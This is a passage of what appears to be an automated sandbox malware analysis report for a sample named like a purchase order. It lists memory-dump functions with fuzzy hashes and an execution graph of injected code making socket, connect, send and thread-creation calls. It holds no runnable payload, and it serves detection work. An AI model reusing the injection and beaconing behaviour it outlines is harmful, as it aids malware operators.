                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: def50fa1c6e09e606bf12fb067a6df98cc38c073584814e15720f4eddf210c5a
                                                                                          • Instruction ID: ade2423dad995fc0e2d5cc478bab9938b65fad3fbe3169a3c96a56c0d3d74260
                                                                                          • Opcode Fuzzy Hash: def50fa1c6e09e606bf12fb067a6df98cc38c073584814e15720f4eddf210c5a
                                                                                          • Instruction Fuzzy Hash: 9C90022260184542D54172595A04B0F410597E1302F91C42EA4146559CCA3589556721
                                                                                          Function 013F2F00 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3f6dd7c667c3bdd91895924249d73d5d3f97ec11bf7a7fde72fcb4b55432c25e
                                                                                          • Instruction ID: e6558f9953473c348313ce03858c28e1ca9a5e6529cacb8f5ef09c392baafc87
                                                                                          • Opcode Fuzzy Hash: 3f6dd7c667c3bdd91895924249d73d5d3f97ec11bf7a7fde72fcb4b55432c25e
                                                                                          • Instruction Fuzzy Hash: 59900222611C0142D60175695E14B07000597D0303F51C52AA0144559CCA3589616521
                                                                                          Function 013F2FB0 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 31b492eba0e28376e8f120b629397949828976dea7de3869b92be0a565f272d1
                                                                                          • Instruction ID: 0e0f7e8c07384467d8af3393812453aec3e23a83cf07639c39d46313d556ae41
                                                                                          • Opcode Fuzzy Hash: 31b492eba0e28376e8f120b629397949828976dea7de3869b92be0a565f272d1
                                                                                          • Instruction Fuzzy Hash: 6590022264140902D541715996147070006D7D0701F51C426A0014559DC7368A6576B1
                                                                                          Function 013F2E00 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ae94d1bf1a406736226517d573a02b8e95123f0b16763d68d868f1ebfcc6b3df
                                                                                          • Instruction ID: 636f5a82bdb9ea00c3ff62ec8fbcd8a5d45d4a567e114d9395202e3552918314
                                                                                          • Opcode Fuzzy Hash: ae94d1bf1a406736226517d573a02b8e95123f0b16763d68d868f1ebfcc6b3df
                                                                                          • Instruction Fuzzy Hash: 3990026260180503D54175595A04607000597D0302F51C426A205455AECB398D517135
                                                                                          Function 013F2E50 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 766ae0d9a88cc86c968f5ccd2a121e8dde89f5c49d4c2ec4bb474076aba575c5
                                                                                          • Instruction ID: cbfabf11072db6b8197d4b0be4ff197ac604bf94062c3ec49a112115f01ef7a1
                                                                                          • Opcode Fuzzy Hash: 766ae0d9a88cc86c968f5ccd2a121e8dde89f5c49d4c2ec4bb474076aba575c5
                                                                                          • Instruction Fuzzy Hash: 8F90026274140542D50171595614B060005D7E1301F51C42AE1054559DC739CD527126
                                                                                          Function 013F2E80 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 19b480ecf9b674bdb320564acf43181635106a59ac03ef875c3a7543f56e973c
                                                                                          • Instruction ID: 62ccaef65c3a31658b6a2c9051e81c3a278968451b79bcf38cfdbfabcfbb160f
                                                                                          • Opcode Fuzzy Hash: 19b480ecf9b674bdb320564acf43181635106a59ac03ef875c3a7543f56e973c
                                                                                          • Instruction Fuzzy Hash: E490026261140142D50571595604706004597E1301F51C427A2144559CC6398D616125
                                                                                          Function 013F2ED0 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 792fc402216884731fa1ba10b1d1db6ceb65bd8acac17fd4e8d5d3ceab97252d
                                                                                          • Instruction ID: c4da656eec17d4a73635b238b78c72d2031f20982db1a37cbeeec44d2f214ea5
                                                                                          • Opcode Fuzzy Hash: 792fc402216884731fa1ba10b1d1db6ceb65bd8acac17fd4e8d5d3ceab97252d
                                                                                          • Instruction Fuzzy Hash: AD900222A0140142454171699A449064005BBE1311751C536A0988555DC67989656665
                                                                                          Function 013F2EC0 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6e86c1e9a230d8210be37b6d00fd7a99de35fe92f6735b0edd1a5ecf435d8f37
                                                                                          • Instruction ID: 0e5a74688328c4ca321cdb45ca14399d50a672d830add29d407bdffe41bd5049
                                                                                          • Opcode Fuzzy Hash: 6e86c1e9a230d8210be37b6d00fd7a99de35fe92f6735b0edd1a5ecf435d8f37
                                                                                          • Instruction Fuzzy Hash: 5090023260180502D50171595A08747000597D0302F51C426A515455AEC775C9917531
                                                                                          Function 013F38D0 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 15fd5406311af1f9cd545f2e8b56a01a7f65399c5b145d37c3fa88506dc936b3
                                                                                          • Instruction ID: efda9bf73841987faf03d96bdfc53d09e23ee31db162eb1f5ed5fd7498352d0e
                                                                                          • Opcode Fuzzy Hash: 15fd5406311af1f9cd545f2e8b56a01a7f65399c5b145d37c3fa88506dc936b3
                                                                                          • Instruction Fuzzy Hash: E690022264545202D551715D56046164005B7E0301F51C436A0804599DC67589557221
                                                                                          Function 013F3C30 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 80411b9ded0bf9dc22ba85c940a74fcb7de5a43c6ae0968395f2ba1b3b36a2ff
                                                                                          • Instruction ID: 30f3ebdfc67c4307e1450b9ea97bc0ff80ec5729591be07688f43e6d9151a4c3
                                                                                          • Opcode Fuzzy Hash: 80411b9ded0bf9dc22ba85c940a74fcb7de5a43c6ae0968395f2ba1b3b36a2ff
                                                                                          • Instruction Fuzzy Hash: 2F90023260240242994172596A04A4E410597E1302B91D82AA0005559CCA3489616221
                                                                                          Function 013F3C90 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 05ba226fad79dc0423da7cb99e08206a27c79b0cb038c95ea2dea2a3ec8b86f9
                                                                                          • Instruction ID: cae209a32ce03b63d14c87d2af1be1c5dc13419677e3cb225becc5e2fdde2859
                                                                                          • Opcode Fuzzy Hash: 05ba226fad79dc0423da7cb99e08206a27c79b0cb038c95ea2dea2a3ec8b86f9
                                                                                          • Instruction Fuzzy Hash: C290023660140502D91171596A04646004697D0301F51D826A041455DDC77489A1B121
                                                                                          Function 013F2B20 Relevance: .0, Instructions: 2COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                          • Instruction ID: 460090df2f4969e08204477fe00ccb76021e563b05be0c414b21ee48f31b134f
                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                          • Instruction Fuzzy Hash:
                                                                                          Function 013E7550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0142454D
                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01424507
                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01424530
                                                                                          • Execute=1, xrefs: 0142451E
                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01424460
                                                                                          • ExecuteOptions, xrefs: 014244AB
                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01424592
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                          • API String ID: 0-484625025
                                                                                          • Opcode ID: 5c89cf9b7040456e1886cbd3f530e51c82292ed976feb760e47e517f18c45375
                                                                                          • Instruction ID: 63619ea43f2ff30bcb0e8186a5c831025e57d0b41a96b49a03cd39ad83d6bfaa
                                                                                          • Opcode Fuzzy Hash: 5c89cf9b7040456e1886cbd3f530e51c82292ed976feb760e47e517f18c45375
                                                                                          • Instruction Fuzzy Hash: 52511D3160036ABAEF119B99DC99FBD77E8EF1831CF0404ADD605A71D1E7709A418F94
                                                                                          Function 013B9046 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$@$@w]v
                                                                                          • API String ID: 0-1680669722
                                                                                          • Opcode ID: 14f861eec29b134079df2a888e133196c1c6b633eaf6aac7504ddba914beb160
                                                                                          • Instruction ID: a78c899f655b312d546a43fc8e67509c15c509b05156387971f95e087b1ec83f
                                                                                          • Opcode Fuzzy Hash: 14f861eec29b134079df2a888e133196c1c6b633eaf6aac7504ddba914beb160
                                                                                          • Instruction Fuzzy Hash: BE811CB1D002699BDB35CF54CC44BEEBBB8AB48714F1441EAEA09B7250E7705E85CFA1

                                                                                          Execution Graph

                                                                                          Execution Coverage:4.7%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:42
                                                                                          Total number of Limit Nodes:3
                                                                                          execution_graph 5195 6a049a 5199 6a04c4 5195->5199 5196 6a0555 5197 6a04eb SleepEx 5197->5199 5199->5196 5199->5197 5200 69efe8 5199->5200 5201 69f02a 5200->5201 5202 69f0c4 5201->5202 5203 69f0ad SleepEx 5201->5203 5202->5199 5203->5201 5204 6a8378 5205 6a83c1 5204->5205 5206 6a83f5 send 5205->5206 5207 6a84c9 5208 6a8464 5207->5208 5210 6a84d4 5207->5210 5209 6a84a5 connect 5208->5209 5211 6a8549 closesocket 5210->5211 5212 6abe29 5213 6abe31 5212->5213 5215 6abdd8 5213->5215 5216 69f868 5213->5216 5218 69f892 5216->5218 5217 69f915 5217->5215 5218->5217 5219 69f8e7 CreateThread 5218->5219 5219->5215 5227 69f85a 5228 69f75e 5227->5228 5229 69f864 5227->5229 5230 69f915 5229->5230 5231 69f8e7 CreateThread 5229->5231 5220 6a822e 5221 6a8280 5220->5221 5222 6a82b4 socket 5221->5222 5235 6a836d 5236 6a8370 5235->5236 5238 6a83c1 5235->5238 5237 6a83f5 send 5238->5237 5223 6a98c2 5224 6a98f0 5223->5224 5225 6a98f4 5224->5225 5226 6a9930 LdrLoadDll 5224->5226 5226->5225 5232 6a8422 5233 6a8428 5232->5233 5234 6a84a5 connect 5233->5234

                                                                                          Executed Functions

                                                                                          Function 006A84C9 Relevance: 3.1, APIs: 2, Instructions: 90networkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: closesocketconnect
                                                                                          • String ID:
                                                                                          • API String ID: 1323028321-0
                                                                                          • Opcode ID: 41bcb4bb147abe693498250042a821a1c1fe7136e6c69a9db8b0623d47aa400d
                                                                                          • Instruction ID: 9807a277abba4a1db9cb864de10cf2d2daf74460c638b8216ead1f316345e405
                                                                                          • Opcode Fuzzy Hash: 41bcb4bb147abe693498250042a821a1c1fe7136e6c69a9db8b0623d47aa400d
                                                                                          • Instruction Fuzzy Hash: 3E218F3050CB489FDB91FF289089B9A77E2FF99300F44057EA89DC7246DB34C5858B56
                                                                                          Function 0069F7DA Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 15 69f7da-69f7e8 16 69f7ea-69f7f1 15->16 17 69f7ff-69f80e 15->17 16->17 18 69f7b2-69f7c7 16->18 21 69f7d0-69f7d3 17->21 22 69f810-69f859 call 6abfe8 17->22 18->21 23 69f781-69f78e 21->23 24 69f7d5-69f7d9 21->24
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0bb4ff45da3ade09673384c1e528e3334531e99052fc58665edecf922d31883e
                                                                                          • Instruction ID: 3e4b752bc23035297e2ef56765371509b14fc8101d153b1967188aacead14a11
                                                                                          • Opcode Fuzzy Hash: 0bb4ff45da3ade09673384c1e528e3334531e99052fc58665edecf922d31883e
                                                                                          • Instruction Fuzzy Hash: CB418B3250C6448FDF54EF24E485395B7E2FB85314F15067DD849CB253D7329486CB85
                                                                                          Function 0069EFE8 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 29 69efe8-69f024 30 69f02a-69f02e 29->30 31 69f0b5-69f0be 30->31 32 69f034-69f037 30->32 31->30 33 69f0c4-69f0cd 31->33 32->31 34 69f039-69f0ab call 6abfe8 call 6abfb8 call 6ac728 32->34 35 69f10f-69f12e 33->35 36 69f0cf-69f0d6 33->36 34->31 48 69f0ad-69f0b3 SleepEx 34->48 38 69f0d8-69f0df 36->38 39 69f0f4-69f0fd 36->39 41 69f0e8-69f0f2 38->41 39->35 42 69f0ff-69f106 39->42 41->39 41->41 42->35 44 69f108-69f109 42->44 44->35 48->31
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: 5a5fd3962d5858cb4a23d9cbde83a11f2ada94de8269b32ff1a232ec231f2b7a
                                                                                          • Instruction ID: 32e870292afeb7ad1707814f9c89f18b2ab5f1062d312456492bf007091b2cf8
                                                                                          • Opcode Fuzzy Hash: 5a5fd3962d5858cb4a23d9cbde83a11f2ada94de8269b32ff1a232ec231f2b7a
                                                                                          • Instruction Fuzzy Hash: DA31C6B141CB488FDB29DF08D4826EA73E5FB85311F50066DD48AC7616DB30A942CB97
                                                                                          Function 0069F85A Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0
                                                                                          • Opcode ID: aa571ec086e762fe205dcd79daa092c09d8b44df147168f93f65d46a496a63ed
                                                                                          • Instruction ID: 0a66627ea7f4a8e47c53cfecc4741f55968024d4c6bd7770b0dd8f3a2238df40
                                                                                          • Opcode Fuzzy Hash: aa571ec086e762fe205dcd79daa092c09d8b44df147168f93f65d46a496a63ed
                                                                                          • Instruction Fuzzy Hash: CA31F13110C7448FEB88EF24D4853A5B7E6FB95314F45063EE449CB293DB71D8468B86
                                                                                          Function 006A049A Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 74 6a049a-6a04e7 call 69b2f8 call 6ab5b8 79 6a04e9 74->79 80 6a0555-6a0564 74->80 81 6a04eb-6a0500 SleepEx 79->81 82 6a0542-6a0549 81->82 83 6a0502-6a0506 81->83 82->81 85 6a054b-6a0553 call 6a0428 82->85 83->81 84 6a0508-6a0513 83->84 84->81 86 6a0515-6a051b 84->86 85->81 86->81 88 6a051d-6a0520 86->88 88->81 90 6a0522-6a0533 call 6a69d8 call 69efe8 88->90 94 6a0538-6a0540 call 69f138 90->94 94->81
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: 4e649abba15ea8110893023f09ea5d785b26aae84fb858c6c661c3a3d0b75d8e
                                                                                          • Instruction ID: 2fed4f141066ba3a4715bc7af8442b17a042498c503597115a0298475a16f2c9
                                                                                          • Opcode Fuzzy Hash: 4e649abba15ea8110893023f09ea5d785b26aae84fb858c6c661c3a3d0b75d8e
                                                                                          • Instruction Fuzzy Hash: FB215430518A18CFEBA4FF28C5906AE77E2FB4A704F55057EE65EC7247DB248C418B86
                                                                                          Function 006A8378 Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 97 6a8378-6a83b8 98 6a83c1-6a83c9 97->98 99 6a83bc call 6a4f48 97->99 100 6a83cb-6a83ef call 6ab5b8 98->100 101 6a83f5-6a8420 send 98->101 99->98 100->101
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: send
                                                                                          • String ID:
                                                                                          • API String ID: 2809346765-0
                                                                                          • Opcode ID: 62921626ce0d7e93dc8fc50f89a0e660d1757981c0eb6621dad89e1bc5fb9df9
                                                                                          • Instruction ID: 4633f2f5b6dafd5a734f8b8d4e2e80e068754f4a3f77dbd1e08ad857b955d286
                                                                                          • Opcode Fuzzy Hash: 62921626ce0d7e93dc8fc50f89a0e660d1757981c0eb6621dad89e1bc5fb9df9
                                                                                          • Instruction Fuzzy Hash: D8111F3091CB489FCB59EF1CA08965577E1FB9C300F0405AEE84DC725ADF709944CB9A
                                                                                          Function 006A8422 Relevance: 1.6, APIs: 1, Instructions: 66networkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 104 6a8422-6a8479 call 6a4fd8 108 6a847b-6a849f call 6ab5b8 104->108 109 6a84a5-6a84c8 connect 104->109 108->109
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: connect
                                                                                          • String ID:
                                                                                          • API String ID: 1959786783-0
                                                                                          • Opcode ID: 342ed03a22d9fe3cbcce41b74d3ad823d73a9d43ea4b60494adb891b7ff1e8d9
                                                                                          • Instruction ID: a35db6c91098adfbf15f846de5c9c57aa21e5537cf4ec1a6a8b100fdb399722c
                                                                                          • Opcode Fuzzy Hash: 342ed03a22d9fe3cbcce41b74d3ad823d73a9d43ea4b60494adb891b7ff1e8d9
                                                                                          • Instruction Fuzzy Hash: 9D115E3091CB489FCB59EF28A08965977E1FB9C310F0401BEE84DC725ADA7089848B96
                                                                                          Function 006A822E Relevance: 1.6, APIs: 1, Instructions: 64networkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 112 6a822e-6a8288 call 6a4e18 115 6a828a-6a82ae call 6ab5b8 112->115 116 6a82b4-6a82d5 socket 112->116 115->116
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: socket
                                                                                          • String ID:
                                                                                          • API String ID: 98920635-0
                                                                                          • Opcode ID: 921828b7ae0f9581d16cd7ae9a78ed39428b2b0424d7efb704e0973d43c0326a
                                                                                          • Instruction ID: bf6005ed114a2cc1c118a7dacee713fe664adf82f8c0ae5663857351130768c0
                                                                                          • Opcode Fuzzy Hash: 921828b7ae0f9581d16cd7ae9a78ed39428b2b0424d7efb704e0973d43c0326a
                                                                                          • Instruction Fuzzy Hash: 80114F3091CA449FCB59EF289089665BBE1FFAD301F0405BEE94DCB25BDA708950CB99
                                                                                          Function 006A98C2 Relevance: 1.6, APIs: 1, Instructions: 57libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 119 6a98c2-6a98f2 call 6ac548 122 6a98ff-6a990b call 6af9f8 119->122 123 6a98f4-6a98fe 119->123 126 6a9919-6a992e call 6abd38 122->126 127 6a990d-6a9914 call 6afcc8 122->127 131 6a994c-6a9954 126->131 132 6a9930-6a9945 LdrLoadDll 126->132 127->126 132->131
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 67b800de07f373ada63f00b8a66a2eedb6b9540f5f36f14d8a57f2deefc0141c
                                                                                          • Instruction ID: 9e3f9dbb8ecb90100392daa283232a96ae26765aa7ecb9f77a25bd95f18a1706
                                                                                          • Opcode Fuzzy Hash: 67b800de07f373ada63f00b8a66a2eedb6b9540f5f36f14d8a57f2deefc0141c
                                                                                          • Instruction Fuzzy Hash: 5101D830608B484BD794F735C8C96A777E6FFD8314F04053EA84EC6151EA35DA45CB46
                                                                                          Function 0069F868 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 133 69f868-69f890 134 69f8b3-69f8e0 call 69b2f8 call 6ab5b8 133->134 135 69f892-69f89d call 6abe18 133->135 143 69f8e2-69f914 call 6afebb CreateThread 134->143 144 69f915-69f91f 134->144 135->134 140 69f89f-69f8a9 135->140 140->134
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0
                                                                                          • Opcode ID: fd4c906c251671eb68816a7f7ff8aaad30e9e9ab6da0375cf5c758643b4c169f
                                                                                          • Instruction ID: dc373402272f44d22f5d07a5d30826f61e15da3321e75a7c86d90b2f105a690e
                                                                                          • Opcode Fuzzy Hash: fd4c906c251671eb68816a7f7ff8aaad30e9e9ab6da0375cf5c758643b4c169f
                                                                                          • Instruction Fuzzy Hash: E811D631614A498FEB84EF28C48D3A6B7E6FB98309F05063DD41DCB252DF758886CB55
                                                                                          Function 006A836D Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
